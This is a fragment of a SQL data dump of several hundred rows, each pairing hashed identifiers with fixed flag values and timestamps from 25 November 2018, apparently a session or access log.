(32539, '9ada1453bd7fffa6368744ffebc68cae', '5df1dcc4e93594b4', 0, 2, 1, '2018-11-25 10:42:49'),
(32540, 'd18b718efe9e017556434d8e0b358b21', '72aeba479a23de15', 0, 2, 1, '2018-11-25 10:44:38'),
(32541, '1b2a40522d6735889c2ade8bcc3fa471', '2af1042fb1937d64', 0, 2, 1, '2018-11-25 10:46:18'),
(32542, 'aae5c32f5a347bf8d04a36604f9ec20f', 'e9c404a26d38dfe3', 0, 2, 1, '2018-11-25 10:46:25'),
(32543, 'd94de7494f9eb90ce581c708c77a7456', '8a144e5fc2e94311', 0, 2, 1, '2018-11-25 10:46:27'),
(32544, 'd18b718efe9e017556434d8e0b358b21', '72aeba479a23de15', 0, 2, 1, '2018-11-25 10:47:02'),
(32545, 'aae5c32f5a347bf8d04a36604f9ec20f', 'e9c404a26d38dfe3', 0, 2, 1, '2018-11-25 10:48:15'),
(32546, '1b2a40522d6735889c2ade8bcc3fa471', '2af1042fb1937d64', 0, 2, 1, '2018-11-25 10:48:15'),
(32547, '9bee926e984af4a640dcedfaef92777f', '606de18a9d7a5d94', 0, 2, 1, '2018-11-25 10:48:24'),
(32548, 'aae5c32f5a347bf8d04a36604f9ec20f', 'e9c404a26d38dfe3', 0, 2, 1, '2018-11-25 10:48:32'),
(32549, 'aae5c32f5a347bf8d04a36604f9ec20f', 'e9c404a26d38dfe3', 0, 2, 1, '2018-11-25 10:49:22'),
(32550, '64894c2f8cb00d3c01a5099309c5f5e7', '196ae7616c94df27', 0, 2, 1, '2018-11-25 10:49:33'),
(32551, 'd18b718efe9e017556434d8e0b358b21', '72aeba479a23de15', 0, 2, 1, '2018-11-25 10:50:01'),
(32552, 'd18b718efe9e017556434d8e0b358b21', '72aeba479a23de15', 0, 2, 1, '2018-11-25 10:51:01'),
(32553, 'c533c2f42135c6c3e902ef335a9bd7ef', '1b466b565be60765', 0, 2, 1, '2018-11-25 10:51:12'),
(32554, '1b2a40522d6735889c2ade8bcc3fa471', '2af1042fb1937d64', 0, 2, 1, '2018-11-25 10:51:39'),
(32555, '9bee926e984af4a640dcedfaef92777f', '606de18a9d7a5d94', 0, 2, 1, '2018-11-25 10:51:51'),
(32556, '266dd6d7c3903c4f935f4c089da26257', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 10:52:05'),
(32557, 'd18b718efe9e017556434d8e0b358b21', '72aeba479a23de15', 0, 2, 1, '2018-11-25 10:52:09'),
(32558, '1b2a40522d6735889c2ade8bcc3fa471', '2af1042fb1937d64', 0, 2, 1, '2018-11-25 10:52:21'),
(32559, '266dd6d7c3903c4f935f4c089da26257', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 10:53:12'),
(32560, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 10:53:26'),
(32561, '9bee926e984af4a640dcedfaef92777f', '606de18a9d7a5d94', 0, 2, 1, '2018-11-25 10:53:29'),
(32562, '00dc5b237dbd1ff36d24642f6df05ef2', '10d9000ca676314c', 0, 2, 1, '2018-11-25 10:53:52'),
(32563, '266dd6d7c3903c4f935f4c089da26257', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 10:53:54'),
(32564, 'b559f88b1d639ae95d94e0b5466540f5', 'f2be47c7b5e54850', 0, 2, 1, '2018-11-25 10:54:26'),
(32565, '9c50e00170dd35261b54872f3303ca3d', '4a9bbb053e611d1d', 0, 2, 1, '2018-11-25 10:55:13'),
(32566, '39b573c7da2f6e2ab2ec2a397ae98750', '3de88ff4581dab27', 0, 2, 1, '2018-11-25 10:55:19'),
(32567, '9bee926e984af4a640dcedfaef92777f', '606de18a9d7a5d94', 0, 2, 1, '2018-11-25 10:55:27'),
(32568, '9bee926e984af4a640dcedfaef92777f', '606de18a9d7a5d94', 0, 2, 1, '2018-11-25 10:55:33'),
(32569, '9bee926e984af4a640dcedfaef92777f', '606de18a9d7a5d94', 0, 2, 1, '2018-11-25 10:55:42'),
(32570, '7dcbbe9591224efcfeb8677edae226f2', 'e5e81a7994414e67', 0, 2, 1, '2018-11-25 10:55:46'),
(32571, '9bee926e984af4a640dcedfaef92777f', '606de18a9d7a5d94', 0, 2, 1, '2018-11-25 10:55:58'),
(32572, '7dcbbe9591224efcfeb8677edae226f2', 'e5e81a7994414e67', 0, 2, 1, '2018-11-25 10:56:05'),
(32573, 'bc0b0cfec2732739ccebe13be8dfbc89', '8e94e7efad43584b', 0, 2, 1, '2018-11-25 10:56:11'),
(32574, '7dcbbe9591224efcfeb8677edae226f2', 'e5e81a7994414e67', 0, 2, 1, '2018-11-25 10:56:17'),
(32575, '7dcbbe9591224efcfeb8677edae226f2', 'e5e81a7994414e67', 0, 2, 1, '2018-11-25 10:56:25'),
(32576, '163a61af5c71ffd214a36e198d3d529f', 'dd0438c71cec594e', 0, 2, 1, '2018-11-25 10:56:36'),
(32577, '7dcbbe9591224efcfeb8677edae226f2', 'e5e81a7994414e67', 0, 2, 1, '2018-11-25 10:56:43'),
(32578, 'aba94cdab22240556eaf7169981a13f1', 'e8f7be4b1d642ed6', 0, 2, 1, '2018-11-25 10:56:48'),
(32579, '163a61af5c71ffd214a36e198d3d529f', 'dd0438c71cec594e', 0, 2, 1, '2018-11-25 10:56:59'),
(32580, 'aba94cdab22240556eaf7169981a13f1', 'e8f7be4b1d642ed6', 0, 2, 1, '2018-11-25 10:57:00'),
(32581, '163a61af5c71ffd214a36e198d3d529f', 'dd0438c71cec594e', 0, 2, 1, '2018-11-25 10:57:06'),
(32582, 'f5906c6f336a33ab6578bd282c875404', '8963c3ef1b9a894e', 0, 2, 1, '2018-11-25 10:57:16'),
(32583, '7dcbbe9591224efcfeb8677edae226f2', 'e5e81a7994414e67', 0, 2, 1, '2018-11-25 10:57:20'),
(32584, 'f5906c6f336a33ab6578bd282c875404', '8963c3ef1b9a894e', 0, 2, 1, '2018-11-25 10:57:29'),
(32585, 'e847245149eba4013abe8ecee9c767f6', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 10:58:35'),
(32586, 'f5c391a8907064cd72211e4c318f1e63', '9b439e4e6dd53e8a', 0, 2, 1, '2018-11-25 10:59:22'),
(32587, '123f025c73b5c6169d083b2c4f390864', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-11-25 11:00:12'),
(32588, '00dc5b237dbd1ff36d24642f6df05ef2', '10d9000ca676314c', 0, 2, 1, '2018-11-25 11:00:20'),
(32589, 'c72aba05000f15dbb8c46d265df18387', '1c7a3046aba6e358', 0, 2, 1, '2018-11-25 11:00:25'),
(32590, 'e847245149eba4013abe8ecee9c767f6', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:00:34'),
(32591, 'bc0b0cfec2732739ccebe13be8dfbc89', '8e94e7efad43584b', 0, 2, 1, '2018-11-25 11:01:14'),
(32592, 'bc0b0cfec2732739ccebe13be8dfbc89', '8e94e7efad43584b', 0, 2, 1, '2018-11-25 11:02:16'),
(32593, '737d32283ccd8d9f8d8a3f7a764f0baa', '911743ecba1f376a', 0, 2, 1, '2018-11-25 11:02:52'),
(32594, 'f5c391a8907064cd72211e4c318f1e63', '9b439e4e6dd53e8a', 0, 2, 1, '2018-11-25 11:03:07'),
(32595, 'e847245149eba4013abe8ecee9c767f6', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:03:32'),
(32596, 'e847245149eba4013abe8ecee9c767f6', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:04:45'),
(32597, '7f6df9613093117651ad6d47c7e20028', 'afd9c09139b89feb', 0, 2, 1, '2018-11-25 11:05:52'),
(32598, '133346b7f20ccb79e3075092bdae201c', 'b42e7e3734fa7429', 0, 2, 1, '2018-11-25 11:05:58'),
(32599, '7dcbbe9591224efcfeb8677edae226f2', 'e5e81a7994414e67', 0, 2, 1, '2018-11-25 11:06:50'),
(32600, '7f6df9613093117651ad6d47c7e20028', 'afd9c09139b89feb', 0, 2, 1, '2018-11-25 11:06:55'),
(32601, '7f6df9613093117651ad6d47c7e20028', 'afd9c09139b89feb', 0, 2, 1, '2018-11-25 11:06:58'),
(32602, '7f6df9613093117651ad6d47c7e20028', 'afd9c09139b89feb', 0, 2, 1, '2018-11-25 11:07:29'),
(32603, 'e847245149eba4013abe8ecee9c767f6', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:07:58'),
(32604, '7dcbbe9591224efcfeb8677edae226f2', 'e5e81a7994414e67', 0, 2, 1, '2018-11-25 11:08:19'),
(32605, 'e6b2c662982390a2399268dc4fd08c98', '4a71d43b3b33af48', 0, 2, 1, '2018-11-25 11:11:15'),
(32606, 'e847245149eba4013abe8ecee9c767f6', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:11:15'),
(32607, 'e6b2c662982390a2399268dc4fd08c98', '4a71d43b3b33af48', 0, 2, 1, '2018-11-25 11:11:21'),
(32608, '53b402ad79e5f3ece3ca60bd176879d4', '12293cb8338188d4', 0, 2, 1, '2018-11-25 11:11:45'),
(32609, '657549cd90684f0da7f156e72d5d0d7b', 'aca2694c49633ef6', 0, 2, 1, '2018-11-25 11:11:59'),
(32610, 'e847245149eba4013abe8ecee9c767f6', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:12:07'),
(32611, '9c50e00170dd35261b54872f3303ca3d', '4a9bbb053e611d1d', 0, 2, 1, '2018-11-25 11:12:33'),
(32612, '1adbcbc0de65ac33269d4c7e9e71ca3d', 'b032b9ae6eb5390e', 0, 2, 1, '2018-11-25 11:14:08'),
(32613, 'e847245149eba4013abe8ecee9c767f6', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:14:23'),
(32614, '672aa5574a3a911d7ac85e61a4f31a8a', '6f9a45eaea213844', 0, 2, 1, '2018-11-25 11:14:42'),
(32615, 'e847245149eba4013abe8ecee9c767f6', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:15:15'),
(32616, '672aa5574a3a911d7ac85e61a4f31a8a', '6f9a45eaea213844', 0, 2, 1, '2018-11-25 11:15:26'),
(32617, '672aa5574a3a911d7ac85e61a4f31a8a', '6f9a45eaea213844', 0, 2, 1, '2018-11-25 11:15:56'),
(32618, '672aa5574a3a911d7ac85e61a4f31a8a', '6f9a45eaea213844', 0, 2, 1, '2018-11-25 11:16:42'),
(32619, '672aa5574a3a911d7ac85e61a4f31a8a', '6f9a45eaea213844', 0, 2, 1, '2018-11-25 11:16:57'),
(32620, '672aa5574a3a911d7ac85e61a4f31a8a', '6f9a45eaea213844', 0, 2, 1, '2018-11-25 11:17:05'),
(32621, '369aa08770de9fe7abd5f7cc1c679f96', '8facc1dfbcf0cb90', 0, 2, 1, '2018-11-25 11:17:52'),
(32622, 'e847245149eba4013abe8ecee9c767f6', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:18:11'),
(32623, 'b2d61f85409114be866c1aaabd3f6622', 'b081782ec9931c72', 0, 2, 1, '2018-11-25 11:20:17'),
(32624, '50cf03e47703888e118fe780de627f63', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:21:20'),
(32625, 'cf8c137879cde7ba2c04536c7b63c58c', 'b2e78912dacced42', 0, 2, 1, '2018-11-25 11:21:31'),
(32626, '50cf03e47703888e118fe780de627f63', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:22:03'),
(32627, '369aa08770de9fe7abd5f7cc1c679f96', '8facc1dfbcf0cb90', 0, 2, 1, '2018-11-25 11:22:11'),
(32628, '50cf03e47703888e118fe780de627f63', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:22:20'),
(32629, '0592484c5e0cf62d695deb6238c13c42', '0ab6a7c2a73171a7', 0, 2, 1, '2018-11-25 11:23:33'),
(32630, '50cf03e47703888e118fe780de627f63', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:24:09'),
(32631, '927dbdd7589b32a0acab896adf48b1a6', '7464cd9676f4a1ec', 0, 2, 1, '2018-11-25 11:24:24'),
(32632, '50cf03e47703888e118fe780de627f63', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:24:34'),
(32633, '0592484c5e0cf62d695deb6238c13c42', '0ab6a7c2a73171a7', 0, 2, 1, '2018-11-25 11:24:39'),
(32634, '50cf03e47703888e118fe780de627f63', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:24:57'),
(32635, '50cf03e47703888e118fe780de627f63', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:25:25'),
(32636, 'd8afd676193ffe0a221ebafecb4f2fff', 'a5736c988cfb53ac', 0, 2, 1, '2018-11-25 11:25:37'),
(32637, 'd8afd676193ffe0a221ebafecb4f2fff', 'a5736c988cfb53ac', 0, 2, 1, '2018-11-25 11:25:51'),
(32638, '2a974590c0a66f930d6081cadccb5880', '57587ada79ea2aa6', 0, 2, 1, '2018-11-25 11:26:52'),
(32639, '50cf03e47703888e118fe780de627f63', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:27:00'),
(32640, '91f608db3997ca6e15fb473dfaf8b5e6', 'f6542dc1cb6f19cb', 0, 2, 1, '2018-11-25 11:27:07'),
(32641, 'a4039ded0c6b366adb98f34245defc99', '455b754602c0390d', 0, 2, 1, '2018-11-25 11:27:42'),
(32642, 'd94de7494f9eb90ce581c708c77a7456', '8a144e5fc2e94311', 0, 2, 1, '2018-11-25 11:28:27'),
(32643, '77281a3c75301665c4ebf02d85f3b4e6', '14d8d3d32fb24127', 0, 2, 1, '2018-11-25 11:28:28'),
(32644, '77281a3c75301665c4ebf02d85f3b4e6', '14d8d3d32fb24127', 0, 2, 1, '2018-11-25 11:28:50'),
(32645, '0bd20b4bcc9297e5728b64200746c27c', 'c40cb1cc5eb13bc9', 0, 2, 1, '2018-11-25 11:29:01'),
(32646, '6fbc8b0d424cccaada50642ff2058f76', 'ff744a4d90b6a515', 0, 2, 1, '2018-11-25 11:29:05'),
(32647, '50cf03e47703888e118fe780de627f63', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:29:11'),
(32648, '1658f5322f184a4a5f274c46f94fd6d1', '32b169e936bbe5df', 0, 2, 1, '2018-11-25 11:29:36'),
(32649, '0bd20b4bcc9297e5728b64200746c27c', 'c40cb1cc5eb13bc9', 0, 2, 1, '2018-11-25 11:29:41'),
(32650, '50cf03e47703888e118fe780de627f63', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:30:00'),
(32651, 'd94de7494f9eb90ce581c708c77a7456', '8a144e5fc2e94311', 0, 2, 1, '2018-11-25 11:30:21'),
(32652, '50cf03e47703888e118fe780de627f63', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:30:27'),
(32653, '6fbc8b0d424cccaada50642ff2058f76', 'ff744a4d90b6a515', 0, 2, 1, '2018-11-25 11:33:01'),
(32654, 'a05931613f0d5d300bb8237caf763ace', 'd70201b8fe7fea11', 0, 2, 1, '2018-11-25 11:33:09'),
(32655, 'f45b5bae0cab145eec7742faef880bdd', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-11-25 11:35:37'),
(32656, 'f45b5bae0cab145eec7742faef880bdd', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-11-25 11:35:46'),
(32657, '50cf03e47703888e118fe780de627f63', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:36:14'),
(32658, '6fbc8b0d424cccaada50642ff2058f76', 'ff744a4d90b6a515', 0, 2, 1, '2018-11-25 11:36:34'),
(32659, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 11:37:55'),
(32660, '6520ebc27add5db3c735afe8b0e0ae99', 'fcaa3c8d44082e09', 0, 2, 1, '2018-11-25 11:38:19'),
(32661, '50cf03e47703888e118fe780de627f63', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:39:38'),
(32662, '50cf03e47703888e118fe780de627f63', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:40:13'),
(32663, '163a61af5c71ffd214a36e198d3d529f', 'dd0438c71cec594e', 0, 2, 1, '2018-11-25 11:40:18'),
(32664, '50cf03e47703888e118fe780de627f63', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:41:38'),
(32665, '7bc9b417ba71c7e1d0e12c36902ea2c7', '1ed1872f69d21a43', 0, 2, 1, '2018-11-25 11:41:57'),
(32666, '7bc9b417ba71c7e1d0e12c36902ea2c7', '1ed1872f69d21a43', 0, 2, 1, '2018-11-25 11:42:08'),
(32667, '7bc9b417ba71c7e1d0e12c36902ea2c7', '1ed1872f69d21a43', 0, 2, 1, '2018-11-25 11:42:19'),
(32668, '7a41c74f5e46ec96850617a1b454202f', 'b7d19042643c022a', 0, 2, 1, '2018-11-25 11:42:51'),
(32669, '50cf03e47703888e118fe780de627f63', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:43:18'),
(32670, '50cf03e47703888e118fe780de627f63', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:46:52'),
(32671, '7bc9b417ba71c7e1d0e12c36902ea2c7', '1ed1872f69d21a43', 0, 2, 1, '2018-11-25 11:48:44'),
(32672, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2018-11-25 11:49:04'),
(32673, '4d636dd564e2c5180c3c7e89db50ac2e', '46713cac27a94b83', 0, 2, 1, '2018-11-25 11:49:09'),
(32674, 'f45b5bae0cab145eec7742faef880bdd', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-11-25 11:49:25'),
(32675, '50cf03e47703888e118fe780de627f63', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:50:03'),
(32676, 'd1788a986c4e10e2a969fc7a21be011d', '074ec8007ba74449', 0, 2, 1, '2018-11-25 11:51:03'),
(32677, '7e0fded25ce1336ce894f1bec3fcfd30', '8d96482d446e2629', 0, 2, 1, '2018-11-25 11:51:46'),
(32678, '50cf03e47703888e118fe780de627f63', '32cd5ee0592c3279', 0, 2, 1, '2018-11-25 11:52:01'),
(32679, '133346b7f20ccb79e3075092bdae201c', 'b42e7e3734fa7429', 0, 2, 1, '2018-11-25 11:53:13'),
(32680, 'dd27cbd5c5e1357dc15b689d0647d57b', '49e64c9c85dd3725', 0, 2, 1, '2018-11-25 11:53:49'),
(32681, '39b573c7da2f6e2ab2ec2a397ae98750', '3de88ff4581dab27', 0, 2, 1, '2018-11-25 11:55:29'),
(32682, 'e5b0175aefd750ed03cf834efa6654f5', '6537a8a3624775b8', 0, 2, 1, '2018-11-25 11:56:53'),
(32683, 'f45b5bae0cab145eec7742faef880bdd', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-11-25 11:57:00'),
(32684, '2a974590c0a66f930d6081cadccb5880', '57587ada79ea2aa6', 0, 2, 1, '2018-11-25 11:57:03'),
(32685, '1ce726344b4c0c856056849a73aa756e', '19ac418837a1bfb6', 0, 2, 1, '2018-11-25 11:57:10'),
(32686, 'ffc7d5cc8bc954745e110b5418cea1e9', '4ae78db741bab2b5', 0, 2, 1, '2018-11-25 11:58:25'),
(32687, '1ce726344b4c0c856056849a73aa756e', '19ac418837a1bfb6', 0, 2, 1, '2018-11-25 11:58:46'),
(32688, '1ce726344b4c0c856056849a73aa756e', '19ac418837a1bfb6', 0, 2, 1, '2018-11-25 11:59:30'),
(32689, 'c4ad5b74026b0183a579baf6733a212d', 'f19010d8a5f137d0', 0, 2, 1, '2018-11-25 12:00:07'),
(32690, '9c50e00170dd35261b54872f3303ca3d', '4a9bbb053e611d1d', 0, 2, 1, '2018-11-25 12:01:54'),
(32691, 'f5c391a8907064cd72211e4c318f1e63', '9b439e4e6dd53e8a', 0, 2, 1, '2018-11-25 12:02:09'),
(32692, '9c50e00170dd35261b54872f3303ca3d', '4a9bbb053e611d1d', 0, 2, 1, '2018-11-25 12:02:26'),
(32693, '9c50e00170dd35261b54872f3303ca3d', '4a9bbb053e611d1d', 0, 2, 1, '2018-11-25 12:02:49'),
(32694, '664dae76081a5d5a3ce3b0d246808cbe', 'df27b9a2919a8206', 0, 2, 1, '2018-11-25 12:03:00'),
(32695, '1ce726344b4c0c856056849a73aa756e', '19ac418837a1bfb6', 0, 2, 1, '2018-11-25 12:04:18'),
(32696, 'c533c2f42135c6c3e902ef335a9bd7ef', '1b466b565be60765', 0, 2, 1, '2018-11-25 12:06:02'),
(32697, '9bee926e984af4a640dcedfaef92777f', '606de18a9d7a5d94', 0, 2, 1, '2018-11-25 12:12:01'),
(32698, 'e633d0d913d2b47733a5562c68a88e49', 'baa8d16c1a4e5230', 0, 2, 1, '2018-11-25 12:13:07'),
(32699, 'c533c2f42135c6c3e902ef335a9bd7ef', '1b466b565be60765', 0, 2, 1, '2018-11-25 12:13:34'),
(32700, '76321189b20848632f942fca529d6c84', 'fd6a5f5164ebb0bd', 0, 2, 1, '2018-11-25 12:14:12'),
(32701, '390bae1114b3207e9e4c2931ac4dfd71', '13049facc9c7b031', 0, 2, 1, '2018-11-25 12:14:41'),
(32702, 'd35ef088eebe70694aebfbf4b59082d7', '39927a6bd6541611', 0, 2, 1, '2018-11-25 12:21:55'),
(32703, 'd35ef088eebe70694aebfbf4b59082d7', '39927a6bd6541611', 0, 2, 1, '2018-11-25 12:22:12'),
(32704, 'd35ef088eebe70694aebfbf4b59082d7', '39927a6bd6541611', 0, 2, 1, '2018-11-25 12:22:22'),
(32705, 'd35ef088eebe70694aebfbf4b59082d7', '39927a6bd6541611', 0, 2, 1, '2018-11-25 12:23:20'),
(32706, 'd35ef088eebe70694aebfbf4b59082d7', '39927a6bd6541611', 0, 2, 1, '2018-11-25 12:24:01'),
(32707, 'a6a9d8ff487645b66948b610b88548b6', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-11-25 12:25:41'),
(32708, '22d4c3b20f64ecac54ec6ec520e4571b', 'a639f655bef0fc87', 0, 2, 1, '2018-11-25 12:38:49'),
(32709, 'ffe700cced30bf076e02f6c8860db9ab', 'c69b16a8ac60521f', 0, 2, 1, '2018-11-25 12:38:57'),
(32710, 'ffe700cced30bf076e02f6c8860db9ab', 'c69b16a8ac60521f', 0, 2, 1, '2018-11-25 12:39:49'),
(32711, '390bae1114b3207e9e4c2931ac4dfd71', '13049facc9c7b031', 0, 2, 1, '2018-11-25 12:41:00'),
(32712, '09b096bacfd3120fd369601d81b37474', '46713cac27a94b83', 0, 2, 1, '2018-11-25 12:48:21'),
(32713, 'bc6d0ba91d1f9c7a24c67ce6413481ef', 'e996039688368fa6', 0, 2, 1, '2018-11-25 13:05:02'),
(32714, 'bc6d0ba91d1f9c7a24c67ce6413481ef', 'e996039688368fa6', 0, 2, 1, '2018-11-25 13:13:45'),
(32715, 'ae21b3659fabbf32902330c4c2f370f0', '1b466b565be60765', 0, 2, 1, '2018-11-25 13:18:26'),
(32716, '1aaec171e91b505ac35db1f6472f808f', '380155314f48d601', 0, 2, 1, '2018-11-25 13:18:36'),
(32717, '19b892f2d01a4bf67e79d593a59b263e', '4c38a2f2118e4994', 0, 2, 1, '2018-11-25 13:19:10'),
(32718, '19b892f2d01a4bf67e79d593a59b263e', '4c38a2f2118e4994', 0, 2, 1, '2018-11-25 13:19:31'),
(32719, '19b892f2d01a4bf67e79d593a59b263e', '4c38a2f2118e4994', 0, 2, 1, '2018-11-25 13:19:43'),
(32720, '19b892f2d01a4bf67e79d593a59b263e', '4c38a2f2118e4994', 0, 2, 1, '2018-11-25 13:19:51'),
(32721, 'b5fe0da3c14b7b3e1e379edc4ffa3463', 'abe6c8ead564b456', 0, 2, 1, '2018-11-25 13:22:46'),
(32722, 'b5fe0da3c14b7b3e1e379edc4ffa3463', 'abe6c8ead564b456', 0, 2, 1, '2018-11-25 13:23:18'),
(32723, '2e37178df5c4dca83d7b1e19adbde197', '30f2212981adef2f', 0, 2, 1, '2018-11-25 13:23:30'),
(32724, 'b5fe0da3c14b7b3e1e379edc4ffa3463', 'abe6c8ead564b456', 0, 2, 1, '2018-11-25 13:23:31'),
(32725, '813cb19ace8ae1650eb95c257c14136d', '196ae7616c94df27', 0, 2, 1, '2018-11-25 13:23:51'),
(32726, 'b5fe0da3c14b7b3e1e379edc4ffa3463', 'abe6c8ead564b456', 0, 2, 1, '2018-11-25 13:24:15'),
(32727, 'b5fe0da3c14b7b3e1e379edc4ffa3463', 'abe6c8ead564b456', 0, 2, 1, '2018-11-25 13:24:23'),
(32728, 'b5fe0da3c14b7b3e1e379edc4ffa3463', 'abe6c8ead564b456', 0, 2, 1, '2018-11-25 13:24:34'),
(32729, 'b5fe0da3c14b7b3e1e379edc4ffa3463', 'abe6c8ead564b456', 0, 2, 1, '2018-11-25 13:24:47'),
(32730, 'b5fe0da3c14b7b3e1e379edc4ffa3463', 'abe6c8ead564b456', 0, 2, 1, '2018-11-25 13:24:55'),
(32731, '4bd8fb7c20a480726fd5d263a8ce6d8c', 'c8545c5db2ff9d21', 0, 2, 1, '2018-11-25 13:27:01'),
(32732, 'd369abd02f4c1227ee8ad3ec0a9e228a', 'e74a2ac966dcd07f', 0, 2, 1, '2018-11-25 13:33:05'),
(32733, 'c3cb6e947c847a70f5d9033c9d3a9c1f', 'a22fc024f2a69fac', 0, 2, 1, '2018-11-25 13:50:36'),
(32734, '22d4c3b20f64ecac54ec6ec520e4571b', 'a639f655bef0fc87', 0, 2, 1, '2018-11-25 13:51:25'),
(32735, '22d4c3b20f64ecac54ec6ec520e4571b', 'a639f655bef0fc87', 0, 2, 1, '2018-11-25 13:53:43'),
(32736, 'f45b5bae0cab145eec7742faef880bdd', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-11-25 13:55:50'),
(32737, 'c3cb6e947c847a70f5d9033c9d3a9c1f', 'a22fc024f2a69fac', 0, 2, 1, '2018-11-25 14:09:35'),
(32738, '19b892f2d01a4bf67e79d593a59b263e', '4c38a2f2118e4994', 0, 2, 1, '2018-11-25 14:13:21'),
(32739, '72911677cbf6672cfe5aa3362280a5a3', '92fceb3dfbbbaf7f', 0, 2, 1, '2018-11-25 14:15:02'),
(32740, '459f8d2a56efb1436f0a63d671e65322', 'e3163f1046dc4449', 0, 2, 1, '2018-11-25 14:19:29'),
(32741, '2d203071f159f88cd304f0e5e83a7c63', '566652276a169238', 0, 2, 1, '2018-11-25 14:24:35'),
(32742, 'b3656e70a7650d3dea50410d986f06c2', '56e277fde1dd496f', 0, 2, 1, '2018-11-25 14:26:01'),
(32743, 'c4b0a412da1add2462d12e5c2f2a1361', 'c910d3c2689a861e', 0, 2, 1, '2018-11-25 14:36:44'),
(32744, '2d203071f159f88cd304f0e5e83a7c63', '566652276a169238', 0, 2, 1, '2018-11-25 14:42:45'),
(32745, '32d42072afd0cb915d52019ba95eba50', '54b1e354d5b62a47', 0, 2, 1, '2018-11-25 14:42:52'),
(32746, '7dcbbe9591224efcfeb8677edae226f2', 'e5e81a7994414e67', 0, 2, 1, '2018-11-25 14:46:41'),
(32747, '7dcbbe9591224efcfeb8677edae226f2', 'e5e81a7994414e67', 0, 2, 1, '2018-11-25 14:47:01'),
(32748, 'c1d5db21a002a2d0e18dfea53de6b1c5', 'a241b97c40d2b2c5', 0, 2, 1, '2018-11-25 14:47:24'),
(32749, 'b3656e70a7650d3dea50410d986f06c2', '56e277fde1dd496f', 0, 2, 1, '2018-11-25 14:50:54'),
(32750, '8aa243e4c56f1399e1f9994562359fce', '3694ad488ca5ab8a', 0, 2, 1, '2018-11-25 15:00:43'),
(32751, '8aa243e4c56f1399e1f9994562359fce', '3694ad488ca5ab8a', 0, 2, 1, '2018-11-25 15:01:39'),
(32752, '8aa243e4c56f1399e1f9994562359fce', '3694ad488ca5ab8a', 0, 2, 1, '2018-11-25 15:01:57'),
(32753, 'f3bc47531aef5e95b26702d78de435cd', '7338979b44094cbf', 0, 2, 1, '2018-11-25 16:06:25'),
(32754, 'a54dcda497bea27c8dece10596980e62', 'b9974a919762d897', 0, 2, 1, '2018-11-25 16:08:25'),
(32755, '31ca2f48973f6230ed766e48668c424a', 'e5e81a7994414e67', 0, 2, 1, '2018-11-25 16:10:33'),
(32756, '7709263ed63e93e3f615e8bad057cf95', '00cfdd65313a346b', 0, 2, 1, '2018-11-25 16:19:41'),
(32757, '9be7391c5718f40cf05b6095bd42aada', 'a2b92167f54c9dc2', 0, 2, 1, '2018-11-25 16:53:30'),
(32758, '1d2dbbfdcbdae778d448340c62f40b06', '99c3169b24a2eba3', 0, 2, 1, '2018-11-25 17:13:39'),
(32759, '1d2dbbfdcbdae778d448340c62f40b06', '99c3169b24a2eba3', 0, 2, 1, '2018-11-25 17:14:50'),
(32760, '1d2dbbfdcbdae778d448340c62f40b06', '99c3169b24a2eba3', 0, 2, 1, '2018-11-25 17:17:16'),
(32761, 'df51b25ac444133248f35b4af1d7c398', 'e5e81a7994414e67', 0, 2, 1, '2018-11-25 17:30:03'),
(32762, 'f4ad2897ce1eee5c93ffb6cbf6389388', '93f30eaefda9d8c4', 0, 2, 1, '2018-11-25 17:42:37'),
(32763, '39b573c7da2f6e2ab2ec2a397ae98750', '3de88ff4581dab27', 0, 2, 1, '2018-11-25 17:58:21'),
(32764, '154984c199aca69bc508f3d86dca463c', '708136f59a117a1b', 0, 2, 1, '2018-11-25 18:03:32'),
(32765, '4712df722e887c15c061706f8f4c76f0', '0ce8c8d05e1b5e4d', 0, 2, 1, '2018-11-25 18:09:42'),
(32766, '79062c71fcfe1f1c165b3e630b8e186e', 'a4936380f1bf3bfb', 0, 2, 1, '2018-11-25 18:27:10'),
(32767, '9a68ca5a5d0b13c3c1fb541d37737b0b', '6092d6c1cb041b23', 0, 2, 1, '2018-11-25 18:27:48'),
(32768, '8baba282f4e948b3cd5a32afa10b9b24', 'e5e81a7994414e67', 0, 2, 1, '2018-11-25 18:37:16'),
